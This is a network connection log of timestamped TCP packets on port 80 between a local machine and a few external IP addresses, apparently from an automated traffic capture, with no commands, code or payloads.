                                  Sep 16, 2024 09:32:13.176203966 CEST8055837199.192.21.169192.168.2.4
                                  Sep 16, 2024 09:32:18.221214056 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:18.226218939 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:18.226284981 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:18.237884998 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:18.242917061 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.472023964 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.472552061 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.472603083 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.472640038 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.472646952 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.474111080 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.493143082 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.493176937 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.493211031 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.493258953 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.493292093 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.493297100 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.493325949 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.493360043 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.493391991 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.493910074 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.493942976 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.493977070 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.494007111 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.494079113 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.559197903 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.559228897 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.559278011 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.559307098 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.559408903 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.559408903 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.579631090 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.579719067 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.579809904 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.579816103 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.579866886 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.579915047 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.580096006 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.580127954 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.580161095 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.580192089 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.580193043 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.580288887 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.580749035 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.580796957 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.580830097 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.580862045 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.580894947 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.580895901 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.580981016 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.581598997 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.581650972 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.581701040 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.581733942 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.581768036 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.581772089 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.581799984 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.582467079 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.582518101 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.582547903 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.633716106 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.645816088 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.645849943 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.645881891 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.645921946 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.645951986 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.645984888 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.645986080 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.646009922 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.648658037 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.666330099 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.666363955 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.666397095 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.666445971 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.666484118 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.666496992 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.666528940 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.666560888 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.666589022 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.666591883 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.666625977 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.666655064 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.666659117 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.667443037 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.667476892 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.667510033 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.667511940 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.667540073 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.667541981 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.667576075 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.667607069 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.668042898 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.668088913 CEST805583844.213.25.70192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 16, 2024 09:32:19.668135881 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.668167114 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.668168068 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.668195963 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.668200016 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.668232918 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.668339968 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.668795109 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.668826103 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.668874979 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.668905973 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.668908119 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.668936014 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.668939114 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.668972015 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.669012070 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.669040918 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.669363022 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.669817924 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.669867039 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.669898033 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.669929028 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.669962883 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.670021057 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.670104027 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.670139074 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.670768023 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.670799017 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.670831919 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.670847893 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.670897007 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.670928955 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.670958996 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.670958996 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.670993090 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.671576023 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.671610117 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.729811907 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.732409954 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.732444048 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.732498884 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.732536077 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.732547998 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.732579947 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.732613087 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.732645035 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.732645035 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.732680082 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.732718945 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.732923031 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.732950926 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.732983112 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.733001947 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.733030081 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.733042002 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.733093977 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.749829054 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.752933979 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.752945900 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.752955914 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.752968073 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.752978086 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.752990007 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.753000975 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.753012896 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.753042936 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.753042936 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.753088951 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.753088951 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.753393888 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.753403902 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.753417015 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.753443956 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.753454924 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.753454924 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.753464937 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.753479958 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.753563881 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.753761053 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.753804922 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.753814936 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.753879070 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.753889084 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.753892899 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.753905058 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.753921986 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.753933907 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.753943920 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.753950119 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.753950119 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.753957987 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.754020929 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.754020929 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.754020929 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.754595041 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.754606009 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.754617929 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.754705906 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.754705906 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.754738092 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.754749060 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.754760027 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.754770994 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.754781961 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.754790068 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.754792929 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.754805088 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.754816055 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.754817963 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.754825115 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.755048990 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.755553961 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.755563974 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.755573034 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.755616903 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.755628109 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.755637884 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.755642891 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.755650043 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.755685091 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.755696058 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.755706072 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.755712986 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.755717993 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.755903959 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.756474972 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.756485939 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.756496906 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.756539106 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.756550074 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.756560087 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.756565094 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.756565094 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.756572962 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.756583929 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.756584883 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.756597042 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.756607056 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.756616116 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:19.756618977 CEST | 80 | 55838 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:19.756719112 CEST | 55838 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:20.761208057 CEST | 55839 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:20.766190052 CEST | 80 | 55839 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:20.766278028 CEST | 55839 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:20.776063919 CEST | 55839 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:20.781250954 CEST | 80 | 55839 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:22.289525986 CEST | 55839 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:22.294733047 CEST | 80 | 55839 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:22.294804096 CEST | 55839 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:23.309503078 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:23.314992905 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:23.322047949 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:23.331491947 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:23.337088108 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:23.337102890 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:23.337111950 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:23.337121010 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:23.337186098 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:23.337194920 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:23.337204933 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:23.337213039 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:23.337320089 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.540472984 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.541198015 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.541234016 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.541248083 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.541269064 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.541327953 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.559808969 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.559875011 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.559920073 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.559925079 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.559957981 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.559988976 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.560005903 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.560020924 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.560055017 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.560067892 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.560683966 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.560730934 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.560743093 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.561512947 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.561570883 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.630548000 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.630640030 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.630671024 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.630706072 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.630701065 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.630767107 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.650412083 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.650485992 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.650547981 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.650571108 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.650604963 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.650639057 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.650650024 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.650672913 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.650733948 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.651376009 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.651464939 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.651498079 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.651506901 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.651531935 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.651577950 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.652368069 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.652400970 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.652432919 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.652442932 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.652467012 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.652504921 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
